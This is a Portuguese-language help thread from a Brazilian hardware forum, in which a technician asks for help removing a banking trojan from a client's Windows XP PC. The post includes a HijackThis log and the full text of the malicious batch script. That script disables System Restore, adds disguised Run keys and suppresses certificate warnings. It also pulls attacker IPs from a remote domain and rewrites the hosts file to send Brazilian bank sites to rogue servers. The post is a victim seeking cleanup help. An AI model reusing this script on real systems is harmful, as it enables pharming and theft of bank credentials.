Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Cleto

PC com vírus removido mas arquivo hosts infectado

Recommended Posts

Olá gente boa! Preciso das dicas e da colaboração de vocês!!

Já olhei outros tópicos e não achei um igual ao meu problema, portanto estou abrindo este tópico...

Seguinte... cliente infectou o micro clicando em link falso de email e o micro foi infectado por um vírus bancário e/ou por um também que abre janelas do IE automaticamente...

Tinha o Avast instalado q detectou, mas não conseguiu remover...

Tirei o Avast e instalei o KIS 7.0. Atualizei e rodei ele e ele eliminou vários arquivos infectados e outros eu mesmo tirei na mão porque nem o KIS dizia que era vírus...

Depois da varredura, o IE voltou ao normal, mas meu arquivo hosts insiste em ser adulterado com páginas falsas de banco... já apaguei o arquivo e ele sempre é criado de novo no boot da máquima...

Passei também o Webroot Spy Sweeper, mas ele achou só um arquivo, um cookie suspeito e nada mais...

Para começar os trabalhos, segue o log do hijackthis com tudo habilitado no msconfig:

Editei e adicionei tambem o texto do arquivo .bat que está modificando meu arquivo hosts...

Mesmo que apague ele no dir Temp ele sempre volta, então preciso de ajuda para descobrir de onde o ***** está vindo...

Agradeço a ajuda e aguardo instruções!! Valeu!!

Logfile of HijackThis v1.99.1

Scan saved at 14:56:18, on 5/6/2008

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16640)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\logonui.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Arquivos de programas\Arquivos comuns\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe

C:\Arquivos de programas\Bonjour\mDNSResponder.exe

C:\Arquivos de programas\Arquivos comuns\EPSON\EBAPI\SAgent2.exe

C:\Arquivos de programas\CyberLink\Shared Files\RichVideo.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\rdpclip.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\VTTimer.exe

C:\Arquivos de programas\iTunes\iTunesHelper.exe

C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe

C:\Arquivos de programas\VIA\VIAudioi\HDADeck\HDeck.exe

C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe

C:\WINDOWS\system32\ctfmon.exe

C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE

C:\Arquivos de programas\iPod\bin\iPodService.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\logon.scr

C:\Arquivos de programas\Internet Explorer\iexplore.exe

C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Windows Live\WLLoginProxy.exe

D:\Uteis\HijackThis\HijackThis_1.99.1\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = &http://home.microsoft.com/intl/br/access/allinone.asp

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

O1 - Hosts: 198.170.81.182 caixa.gov.br

O1 - Hosts: 198.170.81.182 www.caixa.gov.br

O1 - Hosts: 198.170.81.182 caixa.com.br

O1 - Hosts: 198.170.81.182 www.caixa.com.br

O1 - Hosts: 198.170.81.182 cef.gov.br

O1 - Hosts: 198.170.81.182 www.cef.gov.br

O1 - Hosts: 198.170.81.182 www.cef.com.br

O1 - Hosts: 198.170.81.182 www.caixaeconomica.com.br

O1 - Hosts: 198.170.81.182 www.caixaeconomicafederal.com.br

O1 - Hosts: 69.39.224.10 bb.com.br

O1 - Hosts: 69.39.224.10 www.bb.com.br

O1 - Hosts: 69.39.224.10 bancodobrasil.com.br

O1 - Hosts: 69.39.224.10 www.bancodobrasil.com.br

O1 - Hosts: 69.39.224.10 bancobrasil.com.br

O1 - Hosts: 69.39.224.10 www.bancobrasil.com.br

O1 - Hosts: 69.39.224.10 itau.com.br

O1 - Hosts: 69.39.224.10 www.itau.com.br

O1 - Hosts: 69.39.224.10 itaupersonnalite.com.br

O1 - Hosts: 69.39.224.10 www.itaupersonnalite.com.br

O1 - Hosts: 69.39.224.10 www.itauprivatebank.com.br

O1 - Hosts: 69.39.224.10 itauprivatebank.com.br

O1 - Hosts: 69.39.224.10 bradesco.com.br

O1 - Hosts: 69.39.224.10 www.bradesco.com.br

O1 - Hosts: 69.39.224.10 santander.com.br

O1 - Hosts: 69.39.224.10 www.santander.com.br

O1 - Hosts: 69.39.224.10 www.banespa.com.br

O1 - Hosts: 69.39.224.10 banespa.com.br

O1 - Hosts: 69.39.224.10 unibanco.com.br

O1 - Hosts: 69.39.224.10 www.unibanco.com

O1 - Hosts: 69.39.224.10 www.unibanco.com.br

O1 - Hosts: 69.39.224.10 www.rural.com.br

O1 - Hosts: 69.39.224.10 www.bancorural.com.br

O1 - Hosts: 69.39.224.10 nossacaixa.com.br

O1 - Hosts: 69.39.224.10 www.nossacaixa.com.br

O1 - Hosts: 69.39.224.10 real.com.br

O1 - Hosts: 69.39.224.10 www.real.com.br

O1 - Hosts: 69.39.224.10 bancoreal.com.br

O1 - Hosts: 69.39.224.10 www.bancoreal.com.br

O1 - Hosts: 69.39.224.10 www.credicardciti.com.br

O1 - Hosts: 69.39.224.10 www.credicarditau.com.br

O1 - Hosts: 69.39.224.10 www.terra.com.br

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Arquivos de programas\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O2 - BHO: Auxiliar de Conexão do Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O4 - HKLM\..\Run: [VTTimer] VTTimer.exe

O4 - HKLM\..\Run: [QuickTime Task] "C:\Arquivos de programas\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [iTunesHelper] "C:\Arquivos de programas\iTunes\iTunesHelper.exe"

O4 - HKLM\..\Run: [Windows Genuine Advantage] "C:\Documents and Settings\Usuario\Dados de aplicativos\wgatray.exe"

O4 - HKLM\..\Run: [ink Monitor] "C:\Arquivos de programas\Epson\Ink Monitor\Inkmonitor.exe"

O4 - HKLM\..\Run: [AVP] "C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe"

O4 - HKLM\..\Run: [HDAudDeck] "C:\Arquivos de programas\VIA\VIAudioi\HDADeck\HDeck.exe" 1

O4 - HKLM\..\Run: [RemoteControl] "C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] "C:\Arquivos de programas\Arquivos comuns\Ahead\Lib\NeroCheck.exe"

O4 - HKLM\..\Run: [LanguageShortcut] "C:\Arquivos de programas\CyberLink\PowerDVD\Language\Language.exe"

O4 - HKLM\..\Run: [Atualizador - Puxa Rápido] C:\Arquivos de programas\Puxa Rápido\Atualiza.exe

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [swg] C:\Arquivos de programas\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe

O4 - Global Startup: EPSON Status Monitor 3 Environment Check 2.lnk = C:\WINDOWS\system32\spool\drivers\w32x86\3\E_SRCV02.EXE

O8 - Extra context menu item: Adicionar ao Anti-Banner - C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\ie_banner_deny.htm

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Estatísticas do Antivírus da Web - {1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} - C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\SCIEPlgn.dll

O9 - Extra button: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARQUIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O11 - Options group: [iNTERNATIONAL] International*

O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp

O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab

O16 - DPF: {4A85DBE0-BFB2-4119-8401-186A7C6EB653} - http://messenger.zone.msn.com/binary/MJSS.cab69309.cab

O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab

O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

O16 - DPF: {F8C5C0F1-D884-43EB-A5A0-9E1C4A102FA8} (GoPetsWeb Control) - https://secure.gopetslive.com/dev/GoPetsWeb.cab

O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\ARQUIV~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL

O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\ARQUIV~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL

O20 - AppInit_DLLs: C:\ARQUIV~1\KASPER~1\KASPER~1.0\adialhk.dll

O20 - Winlogon Notify: klogon - C:\WINDOWS\system32\klogon.dll

O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll

O23 - Service: Adobe LM Service - Adobe Systems - C:\Arquivos de programas\Arquivos comuns\Adobe Systems Shared\Service\Adobelmsvc.exe

O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Arquivos de programas\Arquivos comuns\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

O23 - Service: Ares Chatroom server (AresChatServer) - Ares Development Group - C:\Arquivos de programas\Ares\chatServer.exe

O23 - Service: Kaspersky Internet Security 7.0 (AVP) - Unknown owner - C:\Arquivos de programas\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" -r (file missing)

O23 - Service: Bonjour Service - Apple Inc. - C:\Arquivos de programas\Bonjour\mDNSResponder.exe

O23 - Service: EPSON Printer Status Agent2 (EPSONStatusAgent2) - SEIKO EPSON CORPORATION - C:\Arquivos de programas\Arquivos comuns\EPSON\EBAPI\SAgent2.exe

O23 - Service: Serviço iPod (iPod Service) - Apple Inc. - C:\Arquivos de programas\iPod\bin\iPodService.exe

O23 - Service: NBService - Nero AG - C:\Arquivos de programas\Nero\Nero 7\Nero BackItUp\NBService.exe

O23 - Service: NMIndexingService - Nero AG - C:\Arquivos de programas\Arquivos comuns\Ahead\Lib\NMIndexingService.exe

O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Arquivos de programas\CyberLink\Shared Files\RichVideo.exe

TEXTO DO ARQUIVO .BAT INFECTADO:

@echo off

break off

setlocal

if %OS%==Windows_NT goto nt

start /max iexplore.exe "http://ver.lovezinho.com"

exit

:nt

if exist %windir%\system32\chkdlx.dll exit

if exist %windir%\system32\chkfrt.dll goto ini

copy "%appdata%"\Win.sys %systemdrive%\Win.sys

set drv=%random:~1,3%

> %temp%\%drv%.reg echo Windows Registry Editor Version 5.00

>> %temp%\%drv%.reg echo.

>> %temp%\%drv%.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\removigbb]

>> %temp%\%drv%.reg echo "Type"=dword:00000001

>> %temp%\%drv%.reg echo "Start"=dword:00000001

>> %temp%\%drv%.reg echo "ErrorControl"=dword:00000001

>> %temp%\%drv%.reg echo "ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,69,00,6e,00,\

>> %temp%\%drv%.reg echo 2e,00,73,00,79,00,73,00,00,00

>> %temp%\%drv%.reg echo "DisplayName"="Driver para remover Gb Plugin"

>> %temp%\%drv%.reg echo.

>> %temp%\%drv%.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\removigbb\Security]

>> %temp%\%drv%.reg echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\

>> %temp%\%drv%.reg echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\

>> %temp%\%drv%.reg echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\

>> %temp%\%drv%.reg echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\

>> %temp%\%drv%.reg echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\

>> %temp%\%drv%.reg echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\

>> %temp%\%drv%.reg echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

>> %temp%\%drv%.reg echo.

>> %temp%\%drv%.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\removigbb]

>> %temp%\%drv%.reg echo "Type"=dword:00000001

>> %temp%\%drv%.reg echo "Start"=dword:00000001

>> %temp%\%drv%.reg echo "ErrorControl"=dword:00000001

>> %temp%\%drv%.reg echo "ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,69,00,6e,00,\

>> %temp%\%drv%.reg echo 2e,00,73,00,79,00,73,00,00,00

>> %temp%\%drv%.reg echo "DisplayName"="Driver para remover Gb Plugin"

>> %temp%\%drv%.reg echo.

>> %temp%\%drv%.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\removigbb\Security]

>> %temp%\%drv%.reg echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\

>> %temp%\%drv%.reg echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\

>> %temp%\%drv%.reg echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\

>> %temp%\%drv%.reg echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\

>> %temp%\%drv%.reg echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\

>> %temp%\%drv%.reg echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\

>> %temp%\%drv%.reg echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

set regedit=%windir%\regedit.exe

%regedit% /s %temp%\%drv%.reg

set reg=%windir%\system32\reg.exe

echo y|%reg% add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run" /v "Windows Genuine Advantage" /t REG_SZ /d "%appdata%\wgatray.exe"

echo y|%reg% add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Genuine Advantage" /t REG_SZ /d "%appdata%\wgatray.exe"

echo y|%reg% add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f

del /q %temp%\%drv%.reg

> %windir%\system32\chkfrt.dll echo zzz

start /max iexplore.exe "http://ver.lovezinho.com"

:ini

set ping=%windir%\system32\ping.exe

:con

%ping% www.google.com -n 1 -l 1 | find "TTL" > nul

if not errorlevel 1 goto ie

goto con

:ie

for /f "tokens=3" %%d in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector" /v IE') do set ie=%%d

if not "%ie%"=="7.0000" goto hs

if exist %temp%\~a.tmp del /q /f %temp%\~a.tmp

reg export HKU %temp%\~a.tmp

if exist %temp%\~b.tmp del /q /f %temp%\~b.tmp

type %temp%\~a.tmp | find "Internet Explorer\Main">%temp%\~b.tmp && for /f "TOKENS=2 delims=\" %%D in ('type %temp%\~b.tmp ^| find "S-1-5-21"') do set CSL=%%D

echo y|reg add "HKU\%CSL%\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f

del /q /f %temp%\~a.tmp && del /q /f %temp%\~b.tmp

set atr=%windir%\system32\attrib.exe

%atr% -h -r -s -a %windir%\system32\drivers\etc

set look=%windir%\system32\nslookup.exe

for /f "tokens=2" %%A in ('%look% ip1.grupoeliete.com ^| find "Address"') do set w1=%%A

for /f "tokens=2" %%B in ('%look% ip2.grupoeliete.com ^| find "Address"') do set w2=%%B

set aa=www

set bb=com

set cc=com.br

set dd=gov.br

set ee=net

set ff=co.uk

set tp=%random:~1,3%

> %temp%\%tp% echo %w1% caixa.%dd%

>> %temp%\%tp% echo %w1% %aa%.caixa.%dd%

>> %temp%\%tp% echo %w1% caixa.%cc%

>> %temp%\%tp% echo %w1% %aa%.caixa.%cc%

>> %temp%\%tp% echo %w1% cef.%dd%

>> %temp%\%tp% echo %w1% %aa%.cef.%dd%

>> %temp%\%tp% echo %w1% %aa%.cef.%cc%

>> %temp%\%tp% echo %w1% %aa%.caixaeconomica.%cc%

>> %temp%\%tp% echo %w1% %aa%.caixaeconomicafederal.%cc%

>> %temp%\%tp% echo %w2% bb.%cc%

>> %temp%\%tp% echo %w2% %aa%.bb.%cc%

>> %temp%\%tp% echo %w2% bancodobrasil.%cc%

>> %temp%\%tp% echo %w2% %aa%.bancodobrasil.%cc%

>> %temp%\%tp% echo %w2% bancobrasil.%cc%

>> %temp%\%tp% echo %w2% %aa%.bancobrasil.%cc%

>> %temp%\%tp% echo %w2% itau.%cc%

>> %temp%\%tp% echo %w2% %aa%.itau.%cc%

>> %temp%\%tp% echo %w2% itaupersonnalite.%cc%

>> %temp%\%tp% echo %w2% %aa%.itaupersonnalite.%cc%

>> %temp%\%tp% echo %w2% %aa%.itauprivatebank.%cc%

>> %temp%\%tp% echo %w2% itauprivatebank.%cc%

>> %temp%\%tp% echo %w2% bradesco.%cc%

>> %temp%\%tp% echo %w2% %aa%.bradesco.%cc%

>> %temp%\%tp% echo %w2% santander.%cc%

>> %temp%\%tp% echo %w2% %aa%.santander.%cc%

>> %temp%\%tp% echo %w2% %aa%.banespa.com.br

>> %temp%\%tp% echo %w2% banespa.com.br

>> %temp%\%tp% echo %w2% unibanco.%cc%

>> %temp%\%tp% echo %w2% %aa%.unibanco.%bb%

>> %temp%\%tp% echo %w2% %aa%.unibanco.%cc%

>> %temp%\%tp% echo %w2% %aa%.rural.%cc%

>> %temp%\%tp% echo %w2% %aa%.bancorural.%cc%

>> %temp%\%tp% echo %w2% nossacaixa.%cc%

>> %temp%\%tp% echo %w2% %aa%.nossacaixa.%cc%

>> %temp%\%tp% echo %w2% real.%cc%

>> %temp%\%tp% echo %w2% %aa%.real.%cc%

>> %temp%\%tp% echo %w2% bancoreal.%cc%

>> %temp%\%tp% echo %w2% %aa%.bancoreal.%cc%

>> %temp%\%tp% echo %w2% %aa%.credicardciti.%cc%

>> %temp%\%tp% echo %w2% %aa%.credicarditau.%cc%

>> %temp%\%tp% echo %w2% %aa%.terra.%cc%

copy %temp%\%tp% %windir%\system32\drivers\etc\hosts&&del /q %temp%\%tp%

:fim

endlocal

exit

Editado por Cleto
Adicionando mais informações...

Compartilhar este post


Link para o post
Compartilhar em outros sites





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×